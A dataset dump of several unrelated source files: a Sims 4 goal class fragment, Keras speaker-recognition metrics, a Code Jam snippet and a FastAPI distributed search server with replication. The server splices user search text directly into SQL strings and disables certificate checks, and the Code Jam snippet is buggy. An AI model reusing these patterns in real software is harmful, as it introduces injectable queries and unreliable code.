else:\n self._on_iteration_completed()\n\n @property\n def completed_iterations(self):\n return self._total_simoleons_earned\n\n @property\n def max_iterations(self):\n return self._goal_test.amount_to_earn\n\nlock_instance_tunables(SituationGoalSimoleonsEarned, _iterations=1)\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"simulation/situations/situation_goal_simoleons_earned.py","file_name":"situation_goal_simoleons_earned.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"40634813472","text":"from typing import Union\nimport keras.metrics\nimport numpy as np\nimport pandas as pd\nfrom keras.callbacks import Callback\nfrom scipy import sparse as sp\nimport tensorflow as tf\nimport keras.backend as K\nfrom preprocessing.constants import AUDIO_DATAFRAME_KEY, STATE_PROB_KEY, TRAIN_SET_PATH_MFCCS, \\\n TRAIN_SET_PATH_MEL_SPEC, TEST_SET_PATH_MFCCS, TEST_SET_PATH_MEL_SPEC, N_STATES_MFCCS\n\n\ndef pandas_object_to_numpy_array(pandas_object) -> np.ndarray:\n audio_tensor = np.zeros(\n (len(pandas_object), pandas_object.iloc[0].shape[0], pandas_object.iloc[0].shape[1]))\n\n for i in range(0, len(pandas_object)):\n audio_tensor[i, :, :] = pandas_object.iloc[i]\n\n return audio_tensor\n\n\ndef load_dataset(path: str, mode: int = 0) -> Union[pd.DataFrame, tuple[np.ndarray, list[sp.lil_matrix]]]:\n \"\"\"\n Loads audio dataset from given path.\n\n :param path: path to load the dataset from.\n :param mode: if given 0 (as by default), numpy tensor containing audio features is unpacked from dataframe and\n separated from labels; if given 1 entire dataframe is given.\n :return: the loaded dataset with the corresponding labels.\n \"\"\"\n\n pandas_object_dataset = pd.read_pickle(path)\n\n if mode == 0:\n numpy_tensor_dataset = pandas_object_to_numpy_array(pandas_object_dataset[AUDIO_DATAFRAME_KEY])\n labels_sparse_matrix_list = list(pandas_object_dataset[STATE_PROB_KEY])\n return numpy_tensor_dataset, labels_sparse_matrix_list\n elif mode == 1:\n return pandas_object_dataset\n\n\ndef get_label_number(labels: list[sp.lil_matrix]) -> int:\n return labels[0].shape[1]\n\n\nclass EarlyStoppingByLossVal(Callback):\n def __init__(self, monitor='val_loss', value=0.01, verbose=0):\n super(Callback, self).__init__()\n self.monitor = monitor\n self.value = value\n self.verbose = verbose\n\n def on_epoch_end(self, epoch, logs=None):\n if logs is None:\n logs = {}\n current = logs.get(self.monitor)\n if current < self.value:\n if self.verbose > 0:\n print(\"Epoch %05d: early stopping THR\" % epoch)\n self.model.stop_training = True\n\n\ndef convert_sparse_matrix_to_sparse_tensor(x: list[sp.lil_matrix]) -> tf.SparseTensor:\n labels_list = []\n\n for m in x:\n coo = m.tocoo()\n indices = np.pad(np.mat([coo.row, coo.col]).transpose(), (1, 0), mode='constant')\n indices = indices[1:, :]\n casted = tf.cast(tf.SparseTensor(indices, coo.data, dense_shape=(1, ) + coo.shape), dtype=tf.dtypes.int64)\n labels_list.append(casted)\n\n labels = tf.sparse.concat(axis=0, sp_inputs=labels_list)\n\n return labels\n\n\ndef one_hot_labels_to_integer_labels(x: list[sp.lil_matrix]) -> np.ndarray:\n\n labels = np.zeros(shape=(len(x), x[0].shape[0]), dtype=np.int64)\n\n for i in range(0, len(x)):\n # Get non-zero column values (we take into account just column indexes because there is only 1 non-zero value\n # for each row)\n labels[i, :] = x[i].nonzero()[1]\n\n return labels\n\n\n@tf.keras.utils.register_keras_serializable(package='training_utils')\ndef coeff_determination(y_true, y_pred):\n \"\"\"\n Computes the Coefficient of Determination (also known as R^2 or R2).\n\n :param y_true: tensor of true targets.\n :param y_pred: tensor of predicted targets.\n :return: the Coefficient of Determination, obtained as (1 - SS_res/(SS_tot)), where\n SS_res = sum((y_true - y_pred)^2) and SS_tot = (y_true - mean(y_true)).\n \"\"\"\n ss_res = K.sum(K.square(y_true - y_pred))\n ss_tot = K.sum(K.square(y_true - K.mean(y_true)))\n return 1 - ss_res / (ss_tot + K.epsilon())\n\n\n@tf.__internal__.dispatch.add_dispatch_support\n@tf.keras.utils.register_keras_serializable(package='training_utils')\n@tf.function\ndef sparse_top_k_categorical_speaker_accuracy_mfccs(y_true, y_pred, k=N_STATES_MFCCS):\n \"\"\"\n Computes how often state targets are in the top `k` predictions for a single speaker.\n \"\"\"\n\n # Create empty output tensor to stack output for each audio\n top_k_accuracy_total_list = tf.TensorArray(dtype=tf.bool, size=0, dynamic_size=True)\n\n for i in tf.range(tf.shape(y_true)[0]):\n\n y_pred_audio = y_pred[i]\n y_true_audio = y_true[i]\n\n # Check the right range, looking the first y_true_audio element\n first_state = tf.cast(y_true_audio[0], dtype=tf.int32)\n\n start_range = tf.subtract(\n first_state,\n tf.math.mod(first_state, tf.convert_to_tensor(N_STATES_MFCCS))\n )\n\n end_range = tf.add(start_range, tf.convert_to_tensor(N_STATES_MFCCS))\n\n top_k_accuracy_audio = tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(False))\n # For each state\n for state in tf.range(start_range, end_range):\n y_true_audio_state = tf.fill(tf.shape(y_true_audio), state)\n\n # Calculate top_k_accuracy vector for given audio and apply logical OR with all the other states\n top_k_accuracy_audio = tf.math.logical_or(\n top_k_accuracy_audio,\n tf.compat.v1.math.in_top_k(y_pred_audio, tf.cast(y_true_audio_state, 'int32'), k)\n )\n # At the end of this loop, the top_k_accuracy_audio vector will contain True in i-th position if at least one\n # valid range state in the top-k most probable ones, so stack this result over the ones of the other audios\n top_k_accuracy_total_list = top_k_accuracy_total_list.write(\n index=top_k_accuracy_total_list.size(),\n value=top_k_accuracy_audio\n )\n\n top_k_accuracy_total = top_k_accuracy_total_list.stack()\n\n return tf.cast(top_k_accuracy_total, K.floatx())\n\n@tf.__internal__.dispatch.add_dispatch_support\n@tf.keras.utils.register_keras_serializable(package='training_utils')\n@tf.function\ndef speaker_n_states_in_top_k_accuracy_mfccs(y_true, y_pred):\n\n \"\"\"\n Computes how often state targets are in the top `k` most probable one of a target speaker divided by k, 1 if k\n states in top-k most probable, 0 if no states in the top-k most probable\n \"\"\"\n\n # Create empty list to stack output for each audio\n top_k_accuracy_total_list = tf.TensorArray(dtype=K.floatx(), size=0, dynamic_size=True)\n\n for i in tf.range(tf.shape(y_true)[0]):\n\n y_pred_audio = y_pred[i]\n y_true_audio = y_true[i]\n\n # Check the right range, looking the first y_true_audio element\n first_state = tf.cast(y_true_audio[0], dtype=tf.int32)\n start_range = tf.subtract(\n first_state,\n tf.math.mod(first_state, tf.convert_to_tensor(N_STATES_MFCCS))\n )\n end_range = tf.add(start_range, tf.convert_to_tensor(N_STATES_MFCCS))\n\n top_k_accuracy_audio = tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(0, dtype=K.floatx()))\n # For each state\n for state in tf.range(start_range, end_range):\n y_true_audio_state = tf.fill(tf.shape(y_true_audio), state)\n\n # Calculate top_k_accuracy vector for given audio and apply logical OR with all the other states\n top_k_accuracy_audio = tf.add(\n top_k_accuracy_audio,\n tf.cast(tf.compat.v1.math.in_top_k(y_pred_audio, tf.cast(y_true_audio_state, 'int32'), N_STATES_MFCCS),\n K.floatx())\n )\n\n # At the end of this loop, the top_k_accuracy_audio vector will contain the number x of valid range states\n # in the top-k most probable ones (not considering repeating probabilities, N_STATES_MFCCS in the best case, 0\n # in the worst case), then divide the result by N_STATES_MFCCS and take the minimum between 1 and the result\n # (to get 1 in the best case, considering also repeating probabilities in the top-k can cause the result of the\n # division to go above 1) and stack it over the ones of the other audios\n top_k_accuracy_audio = tf.minimum(\n tf.divide(top_k_accuracy_audio, tf.convert_to_tensor(N_STATES_MFCCS, dtype=K.floatx())),\n tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(1.0, dtype=K.floatx()))\n )\n top_k_accuracy_total_list = top_k_accuracy_total_list.write(\n index=top_k_accuracy_total_list.size(),\n value=top_k_accuracy_audio\n )\n\n top_k_accuracy_total = top_k_accuracy_total_list.stack()\n\n return tf.cast(top_k_accuracy_total, K.floatx())\n\n\n","repo_name":"MattiaLimone/dnn-hmm","sub_path":"training/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23585819431","text":"from math import pi\r\n\r\nr = []\r\nh = []\r\nside = []\r\nmax_r = 0\r\n\r\nif __name__ == '__main__':\r\n \r\n with open('in.txt', 'r') as file:\r\n test_cases = int(file.readline())\r\n\r\n for case_no in range(test_cases):\r\n\r\n n, k = (int(inp) for inp in file.readline().split())\r\n\r\n for i in range(n):\r\n \r\n ri, hi = (int(inp) for inp in file.readline().split())\r\n r.append(ri)\r\n h.append(hi)\r\n side.append(2 * pi * r * h)\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/318.py","file_name":"318.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72151664515","text":"from fastapi import FastAPI, Body\nfrom pydantic import BaseModel\nfrom typing import Optional, List\nfrom math import floor\nimport copy\nimport json\nimport re\nimport requests # Para realizar peticiones a otros servers y descargar archivos\n\nfrom file_handler import *\n# from app.file_handler import *\n\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom database import DataB, convert_str_to_text_class, Text\nimport threading, time, os\n\n# Logs\nfrom logs.logs_format import *\n\n#### SRI ####\nfrom vector_model import VectorModel\nfrom pathlib import Path\nimport database\n#############\n\nimport datetime\n\n# Logs\nfrom logs.logs_format import *\n\nfrom servers import *\n\n# Variable para decir si es esta corriendo en local o en docker\nlocal = True\n\n# Tipo de hash a utilizar\nhash_type = \"RANDOM\"\n\ntry:\n if str(os.environ.get(\"LOCAL\")) == \"False\":\n local=False\n print_debug(f\"local: {local}\")\nexcept:\n local = True\n#LO PONGO MANUAL\n# local = True\n# Docker\ngateway = \"172.21.0.1\"\n\n# Api Servers\nservers:List[Address] = get_servers(local)\n\n# servers = ['localhost']\n\n# Clusters of n servers. Update when a new server joins\nclusters = ['127.0.0.1']\n\n# Chord\nfirst_server_address_ip = '127.0.0.1' # Correrlo local '172.20.10.2'\nfirst_server_address_port = 10000 # Correrlo local\n\nif not local:\n first_server_address_ip = str(os.environ.get('FIRST_SERVER')) #servers[0].ip if len(servers) > 0 else 'localhost' # Correrlo local\n first_server_address_port = 8000 # Correrlo local\n\n# Chord Thread\nstopped = False\n\nserver = '127.0.0.1'\nport = 10002 # Correrlo local\n# brenckman,m. ting-yili\nif not local:\n server = str(os.environ.get('IP')) # Correrlo con Docker\n port = int(os.environ.get('PORT')) # Correrlo con Docker\n\nprint(\"ROXANA SERVER = \", server)\nprint(\"ROXANA PORT = \", port)\n\nTIMEOUT = 20\nif not local:\n try:\n TIMEOUT = int(os.environ.get('TIMEOUT')) # Correrlo con Docker\n except:\n pass\n\n# Files\nfilepath = \"/txts/\"\nif not local:\n try:\n filepath = str(os.environ.get('FILEPATH')) # Correrlo con Docker\n if filepath == \"None\":\n filepath = \"/txts/\"\n except:\n pass\n\n# Default Leader Port\nDEFAULT_LEADER_PORT = 8000\nif not local:\n try:\n DEFAULT_LEADER_PORT = int(os.environ.get('DEFAULT_LEADER_PORT'))\n except:\n pass\n\n# Hash\nif not local:\n try:\n hash_type = str(os.environ.get('HASH_TYPE'))\n print_debug(f\"Hash type: {hash_type}\")\n except:\n pass\n\napp = FastAPI()\n\n#ROXANA\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nPATH_TXTS = os.path.join(CURRENT_DIR, \"txts\")\nDATABASE_DIR = os.path.join(CURRENT_DIR, \"databases\")\nlock = threading.Lock()\ndatabase = DataB()\nports_list = [] #LISTA DE PUERTOS DE CADA NUEVO SERVIDOR DE LA RED\nservers_ID_list = [] # NECESITO SABER EL TOTAL DE SERVIDORES DE LA RED y su ID\nservers_IP_list = [] # con su IP\nname_db = ''\n\n############ SRI ############\nvec_mod = VectorModel()\n#############################\n\n# Configuración de CORS\norigins = [\n \"http://127.0.0.1\",\n \"http://127.0.0.1:8080\",\n \"http://172.17.0.3\",\n \"http://172.17.0.3:8080\",\n \"http://172.17.0.1\",\n \"http://172.17.0.1:8080\",\n \"http://172.17.0.2\",\n \"http://172.17.0.2:8080\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nfiles = [\n {\n \"id\":0, \n \"file\":{\"file_name\": \"Archivo de Roxana\", \"server_number\": 0}\n },\n {\n \"id\":1, \n \"file\":{\"file_name\": \"Archivo de Paula\", \"server_number\": 0}\n },\n {\n \"id\":2, \n \"file\":{\"file_name\": \"Archivo de Krtucho\", \"server_number\": 0}\n }\n]\n\n\n# def search_file(id):\n# return [file[\"file\"] for file in files if file[\"id\"] == id]\n\n\n# Si notification_type = True => Se refiere a buscar archivos por su nombre o ranking\n# Si notification_type = False => Se refiere a devolver archivos para download\ndef send_notification(server:str, results_, notification_type = True): #ROXANA\n print(\"Notificatin type +++++++++++++++\", notification_type)\n with lock:\n print(\"ENTRO EN SEND NOTIFICATION\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().name))\n print(f\"server = {node.node_address.ip}, PORT = {node.node_address.port}\")\n try:\n result = requests.get(server, verify=False)\n\n print(\"\\R:\")\n print(\"result \",result)\n print(\"result.content \",result.content)\n print(\"result.text \",result.text)\n print(\"result.text[0] \",result.text[0])\n print(\"R/\")\n\n selected_list = result.json()\n print(\"selected list \", selected_list)\n except:\n print(\"--------------- DIO ERROR EN EL REQUEST DE send_notification\")\n\n if notification_type: #REQUEST SEARCH\n # selected_name = selected_list[1] #ARREGLAR\n # selected_result = selected_list[0]\n # print(\"selected_name \", selected_name)\n # if selected_name:# El resultado que devolvio la peticion es el nombre del archivo\n for r_name in selected_list:\n # print(\"r_name \", r_name)\n # print(\"r_name[0] \", r_name[0])\n # print(\"r_name[1] \", r_name[1])\n results_.append(r_name) #results.extend(r) # Add matched documents to the shared list\n print(\"results in send_notification \", results_)\n # else:# El resultado que devolvio la peticion es el ranking de los posibles archivos\n # for r_ranking in selected_result:\n # print(\"r_ranking \", r_ranking)\n # print(\"r_ranking[0] \", r_ranking[0])\n # print(\"r_ranking[1] \", r_ranking[1])\n # results_ranking.append(r_ranking)\n else: #REQUEST DOWNLOAD\n print(\"SENDIND REQUEST TO DOWNLOAD A FILE\")\n print(\"selected_list[0] \", selected_list[0])\n print(\"selected_list[1] \", selected_list[1])\n results_.append(selected_list)\n \n\ndef search_to_download(number: str): #ROXANA\n print(\"ENTRO EN SEARCH TO DOWNLOAD\")\n print(number)\n threading_list = []\n results_files_download = [] # List with the ranking and query documents results\n for i, member in enumerate(node.chan.osmembers.items()): # Esta parte sera necesaria hacerla sincrona para recibir cada respuesta en paralelo y trabajar con varios hilos\n print(f\"MEMBER {member}\")\n print(f\"ESTOY EN EL LLAMADO DE LOS HILOS: IP = {member[1].ip}\")\n print(f\"server = {node.node_address.ip}\")\n if member[1].ip == node.node_address.ip:continue \n # if member[1].port == node.node_address.port:continue # para correrlo local\n server = f'http://{member[1].ip}:{member[1].port}/api/download/{number}'\n t = threading.Thread(target=send_notification, args=(server, results_files_download, False), name=\"Hilo {}\".format(i))\n threading_list.append(t)\n print(\"T.START\")\n t.start()\n \n for t in threading_list:\n print(\"T.JOIN\")\n t.join()\n\n print(\"results_files_download \", results_files_download)\n print(\"len(results_files_download)=\", len(results_files_download))\n response = None\n for result in results_files_download:\n if type(result) != bool:\n response = copy.copy(result)\n break\n print(\"response \", response)\n return response\n\n\ndef search_by_text(text: str): #ROXANA\n print(\"ENTRO EN SEARCH BY TEXT\")\n print(text)\n threading_list = []\n results_ = [] # Shared list to store the matched document names and List with the ranking and query documents results\n # Construir ranking a partir de cada listado de archivos recibidos gracias al tf_idf\n # Search text in every server\n # TODO: Paralelizar peticiones a todos los servidores para pedirles sus rankings. https://docs.python.org/es/3/library/multiprocessing.html\n for i, member in enumerate(node.chan.osmembers.items()): # Esta parte sera necesaria hacerla sincrona para recibir cada respuesta en paralelo y trabajar con varios hilos\n print(f\"MEMBER {member}\")\n print(f\"ESTOY EN EL LLAMADO DE LOS HILOS: IP = {member[1].ip}\")\n print(f\"server = {node.node_address.ip}, PORT = {node.node_address.port}\")\n # Si se esta probando con docker o varias pcs la condicion del if es q no sea el mismo ip\n if member[1].ip == node.node_address.ip:continue \n # Si se esta probando local entonces la condicion del if es q no sea el mismo port\n # if member[1].port == node.node_address.port:continue \n server = f'http://{member[1].ip}:{member[1].port}/api/files/search/{text}'\n t = threading.Thread(target=send_notification, args=(server, results_), name=\"Hilo {}\".format(i))\n threading_list.append(t)\n print(\"T.START\")\n t.start()\n \n for t in threading_list:\n print(\"T.JOIN\")\n t.join()\n \n print(\"search_by_text results_name \",results_)\n #print(\"search_by_text results_ranking \",results_ranking)\n # Make Ranking \n # Luego de esperar cierta cantidad de segundos por los rankings pasamos a hacer un ranking general de todo lo q nos llego\n # TODO: Si alguna pc se demora mucho en devolver el ranking, pasamos a preguntarle a algun intregrante de su cluster que es lo que sucede\n \n # Return Response\n # Retornamos el ranking general de todos los rankings combinados\n \n print(\"@@@@@@@ results_ name AND ranking \", results_)\n\n #print(\"@@@@@@@ results_ranking \", results_ranking)\n\n unique_result = []\n for i in results_:\n if i not in unique_result:\n print(f\"-------for i in results_: i = {i} \")\n unique_result.append(i)\n\n\n # for i in results_ranking:\n # if i not in results_name:\n # results_name.append(i)\n\n #results_name_str = decorate_data(results_name)\n results_name_str = decorate_data(unique_result)\n # results_ranking_str = decorate_data(results_ranking)\n\n print(\"@@@@@@@ results_name_str \", results_name_str)\n\n # print(\"@@@@@@@ results_ranking_str \", results_ranking_str)\n\n # result = results_name_str + results_ranking_str\n \n # return results_name_str, results_ranking_str\n\n # return result\n\n # for i in results_ranking_str:\n # if i not in results_name_str:\n # results_name_str.add(i)\n\n return results_name_str\n\ndef decorate_data(results): #ROXANA\n # print(\"ENTRO A DECORATE DATA\")\n # print(\"results \", results)\n result = []\n # final_string = {}\n for i, elem in enumerate(results):\n final_string = {}\n # print(\"*final_string \", final_string)\n # print(f\"i={i}, elem= {elem}\")\n # print(\"elem[0] \", elem[0])\n # print(\"elem[1] \", elem[1])\n # final_string[f\"id_{i}\"] = elem[0]\n # final_string[f\"name_{i}\"] = elem[1]\n # # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n # final_string[f\"url_{i}\"] = f'https://{server}:{port}'\n final_string[f\"id\"] = elem[0]\n final_string[f\"name\"] = elem[1]\n # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n # final_string[f\"url\"] = f'https://{server}:{port}'\n final_string[f\"url\"] = f'http://{server}:{port}/download/{str(elem[0])}'\n result.append(final_string)\n # print(\"final string \", final_string)\n print(\"*********---------------------------------------\", result)\n # return final_string\n return result\n\n\ndef decorate_data_rank(ranking: list): \n print(\"ENTRO A DECORATE DATA\")\n print(\"results \", ranking)\n final_string = {}\n for i, elem in enumerate(ranking):\n print(f\"i={i}, elem= {elem}\")\n final_string[f\"id__{i}\"] = elem[0]\n final_string[f\"similarity__{i}\"] = elem[1]\n # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n final_string[f\"url_{i}\"] = f'https://{server}:{port}'\n print(\"final string \", final_string)\n return final_string\n\n\ndef match_by_name(text:str): #ROXANA\n print(\"ENTRO EN MATCH BY NAME\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().native_id))\n #select_files_title = f\"SELECT Title FROM File WHERE File.Title = '{text}'\"\n select_files_author = f\"SELECT ID, Title FROM File WHERE File.Author = '{text}'\"\n select_all_authors = f\"SELECT ID, Author FROM File\"\n select_all_titles = f\"SELECT ID, Title FROM File\"\n result_1 = database.execute_read_query(select_files_author)\n result_2 = []\n result_3 = database.execute_read_query(select_all_authors)\n result_4 = database.execute_read_query(select_all_titles)\n print(\"result_4 \", result_4)\n if len(result_4) > 0:\n for index, t in enumerate(result_4):\n if text in t[1]:\n result_2.append(t)\n print(\"result[0]\",t[0])\n print(\"result[1]\",t[1])\n print()\n\n print(\"-------------RESULTADO ALL AUTHORS\",result_3)\n print(\"-------------RESULTADO por AUTHOR, Title\",result_1)\n print(\"-------------RESULTADO ALL Titles\",result_4)\n print(\"-------------RESULTADO TITULOS SELECCIONADOS \", result_2)\n return result_1 + result_2 \n\n\n####### SRI #######\ndef tf_idf(textt: str):\n # http://localhost:10000/files/search/brenckman,m.\n # print(\"---------------Entro en tf_idf\")\n ranking = vec_mod.run(textt)\n result = []\n \n # print(\"---------------------\")\n # print(\"ranking\", ranking)\n # print(\"-------------\")\n\n for id, rank in ranking: #new_rank no esta definido. PONGO MOMENTANEAMENTE ranking\n # print(\" entro for del tf_idf ++++++++++++++++\")\n db_query = f\"SELECT ID, Title FROM File WHERE File.ID = '{str(id)}'\"\n for i in database.execute_read_query(db_query):\n # print(\"***** \", i)\n result.append(i)\n # print()\n # print(result)\n \n # print(\"---------------------\")\n # print(\"result\", result)\n # print(\"-------------\")\n\n return result\n # pass # Paula\n###################\n\n\ndef check_database(number):\n query = f\"SELECT ID FROM File WHERE File.ID = '{number}'\"\n result_ID = database.execute_read_query(query)\n return result_ID\n\ndef delete_db(directory, file_name):\n file_path = os.path.join(directory, file_name)\n if os.path.exists(file_path):\n os.remove(file_path)\n print(\"El archivo se ha eliminado exitosamente.\")\n else:\n print(\"El archivo no existe.\")\n\ndef add_to_database(datab, name_db, files: List[str], vec_mod_cond:bool):\n text_list = convert_str_to_text_class(PATH_TXTS,files)\n #A cada servidor le toca un archivo.db que se asigna en dependencia de su puerto\n print(\"DATABASE_DIR \", DATABASE_DIR + \"/\"+ name_db)\n if name_db != \"\":\n print(\"CREAR NUEVA BD\")\n delete_db(DATABASE_DIR, name_db)\n datab.create_connection(DATABASE_DIR + \"/\"+ name_db) #MODIFICAR CAMBIAR ITERACION\n \n for file in text_list:\n datab.insert_file(file)\n \n if vec_mod_cond:\n ######### SRI #########\n vec_mod.doc_terms_data(text_list) # se le pasa la lista de archivos que se le pasa a la base de datos de ese server\n # aqui empieza a calc os tf idf\n # print(vec_mod.doc_terms)\n #######################\n\n#asignar los documentos a cada server segun el orden en la lista\ndef assign_documents(start, end, datab, name_db): #ROXANA\n print(\"ENTRO AL assign_documents\")\n docs_to_add = []\n #toma los documentos desde el ultimo ID de server hasta el propio ID del nuevo server incluyendolo\n for i in range(start,end):\n docs_to_add.append(f\"document_{i}.txt\")\n\n print(f\"docs_to_add en assign_documents = {docs_to_add}, len = {len(docs_to_add)}\")\n # Annade los docs a la BD y calcula el SRI\n add_to_database(datab,name_db, docs_to_add, True) \n\n #text_list = convert_str_to_text_class(PATH_TXTS,docs_to_add)\n ##A cada servidor le toca un archivo.db que se asigna en dependencia de su puerto\n #print(\"DATABASE_DIR \", DATABASE_DIR + \"/\"+ name_db)\n #datab.create_connection(DATABASE_DIR + \"/\"+ name_db) #MODIFICAR CAMBIAR ITERACION\n #for file in text_list:\n # datab.insert_file(file)\n #\n ########## SRI #########\n #vec_mod.doc_terms_data(text_list) # se le pasa la lista de archivos que se le pasa a la base de datos de ese server\n # aqui empieza a calc os tf idf\n # print(vec_mod.doc_terms)\n #######################\n\n node.update_server_files(docs_to_add, [])\n # node.run() #CARLOS\n # print(\"Node Run\")\n # # t1 = threading.Thread(target=node.run)\n # t2 = threading.Thread(target=chord_replication_routine)\n\n # # t1.start()\n # t2.start()\n # print(\"SALIO DEL assign_documents\")\n\n#En la lista de servers_list inicialmente esta vacia y a medida que se conectan en la red los nuevos servers\n# es q se agregan a la lista y se le asignan nuevos documentos.Para esto se tiene en cuenta el ID de los\n# documentos y el ID de los servers.\ndef init_servers(datab, name_db):\n print(\"ENTRO A init_servers\")\n miembros = node.chan.osmembers\n print(f\"GET MEMBERS = {node.get_members()}\")\n n = len(miembros.keys())\n print(\"miembros = \", miembros)\n print(\"n = \", n)\n newserver_id = int(list(miembros.keys())[n - 1])\n \n print(\"newserver_id = \", newserver_id)\n name_db = f'db_{newserver_id}.db'\n print(\"name_db = \", name_db)\n new_members = []\n for m in miembros.items():\n m = (int(m[0]), m[1])\n new_members.append(m)\n print(\"miembros casteados a entero \", new_members)\n new_members = sorted(new_members) #para ordenar los servers por ID\n \n print(\"miembros sorted \", new_members)\n #Actualizo las listas del nuevo nodo\n for i in range(n):\n print(\"key = \", new_members[i][0])\n print(\"int(miembros[i][0]) == newserver_id = \", int(new_members[i][0]) == newserver_id)\n if int(new_members[i][0]) == newserver_id: #Solo entra 1 vez\n start = 1\n if i > 0: start = int(new_members[i - 1][0]) + 1\n print(\"prev id = \", start)\n # Annadir a la BD del nuevo server los docs que le tocan\n assign_documents(start,newserver_id + 1, datab, name_db)\n # Quitar a la BD del sucesor del nuevo server los docs que le tocan al nuevo a traves de un endpoint\n print(\"i <= n - 2 = \", i <= n - 2)\n print(f\"----------i = {i}\")\n print(f\"----------n - 2 = {n -2}\")\n if i <= n - 2:\n rango = f'{start}_{newserver_id + 1}'\n succ_ip = new_members[i + 1][1]['ip']\n succ_port = new_members[i + 1][1]['port']\n print(f\"ENTRO A SUCESOR = {succ_ip}:{succ_port}\")\n server_str = f'http://{succ_ip}:{succ_port}/api/remove_doc/{rango}'\n try:\n requests.delete(server_str, verify=False)\n except:\n print(\"DIO ERROR EN EL init_servers\")\n\n new_id = int(new_members[i][0])\n try:\n # if n == 1:\n new_ip = new_members[i][1].ip\n new_port = new_members[i][1].port\n except:\n new_ip = new_members[i][1]['ip']\n new_port = new_members[i][1]['port']\n\n print(\"new_members[i] = \", new_members[i])\n print(\"new_id = \", new_id)\n print(\"new_ip = \", new_ip)\n print(\"new_port = \", new_port)\n \n servers_ID_list.append(new_id)\n servers_IP_list.append(new_ip) \n ports_list.append(new_port)\n\n print(\"servers_ID_list \", servers_ID_list)\n print(\"servers_IP_list \", servers_IP_list)\n print(\"ports_list \", ports_list)\n\n\n #REPLICAR LOS DOCS DEL PREV \n print(\"Node Run\")\n t2 = threading.Thread(target=chord_replication_routine)\n t2.start()\n\n # coord\n t3 = threading.Thread(target=check_alive)\n t3.start()\n\n print(\"SALIO DEL INIT\")\n\ndef replication_files1(next_id, next_address):\n print(f\"-------ENTRO EN replication_files 1\")\n current_id = node.nodeID\n print_success(f\" current_id = {current_id}\")\n prev_adr = node.chan.get_member(node.get_predecessor())\n print_success(f\"!!!!!!!!!!!!!!!!!!!prev = {prev_adr}\")\n print_success(f\"!!!!!!!!!!!!!!!!!!!succesor = {next_id}, {next_address}\")\n if str(next_id) != str(current_id) or next_address != None:\n ## 1- Actualizar el node.replay del succ del succ, ahora son los nuevos docs. \n ## porque se cambio su node.data y se actualizo\n #print(\"----------------------------------PASO 1\")\n #if current_id < next_id: #Si el nuevo nodo es de mayor ID => no tengo q actualizar el replay del succ del succ\n # # LLamar al succ y q este llame a su succ y actualice su node.replay\n # try:\n # print(\"1-\")\n # url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_succ_data'\n # except:\n # print(\"2-\")\n # url = f'http://{next_address.ip}:{next_address.port}/api/update_succ_data'\n#\n # print(f\"url = {url}\")\n # try:\n # response_data_node_succ = requests.get(url, verify=False)\n # print('Elementos replicados exitosamente')\n # except:\n # print('Error al replicar elementos')\n#\n # 2- Actualizar el node.replay del succ, en vez de ser la data del node prev \n # ahora sera la data del current node.\n print(\"----------------------------------PASO 2\")\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_replay_data'\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data[0] = {current_data}\")\n doc = \"\".join(current_data)\n\n print(f\"url = {url}\")\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n # 3- Actualizar el node.replay del current node, seran los docs de prev node\n print(\"----------------------------------PASO 3\")\n try:\n print(\"1-\")\n url = f'http://{prev_adr[\"ip\"]}:{prev_adr[\"port\"]}/api/get_actual_data'\n except:\n print(\"2-\")\n url = f'http://{prev_adr.ip}:{prev_adr.port}/api/get_actual_data'\n print(f\"url = {url}\")\n # obtener los doc del node preview\n try:\n response_data_prev = requests.get(url, verify=False) \n data_prev = response_data_prev.json()\n print(f\"data_prev = {data_prev}, len = {len(data_prev)}\")\n data_prev_list = list(data_prev[0].values())[0]\n print(f\"data_prev_list = {data_prev_list}, len = {len(data_prev_list)}\")\n node.update_server_files(current_data, data_prev_list)\n add_to_database(database,\"\",data_prev_list, True)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n print(\"COMPROBANDO TODO....\")\n all_data = get_all_data()\n print_success(f\"all_data = {all_data}, len = {len(all_data)}\")\n print_success(\"!!!! TERMINO EL replication_files 1!!!!\")\n\n# Se cayo el nodo siguiente a mi\n# next_fallen = True: se cayo el de alante de mi\n# next_fallen = False: se cayo el de atras de mi\ndef replication_files2(next_id, next_address, next_fallen):\n print(f\"-------ENTRO EN replication_files 2\")\n print_success(f\"-----------------next address: {next_id}, {next_address}\")\n current_id = node.nodeID\n print_success(f\" current_id = {current_id}\")\n print_success(f\"------------len(node.get_members()) = {len(node.get_members())}\")\n\n if len(node.get_members()) == 1: #ES el unico nodo que queda\n print(\"SOLO QUEDA 1 NODO EN LA RED\")\n new_data_combined = list(node.data.values())[0]\n print(f\"list(node.data.values())[0] = {new_data_combined}, len = 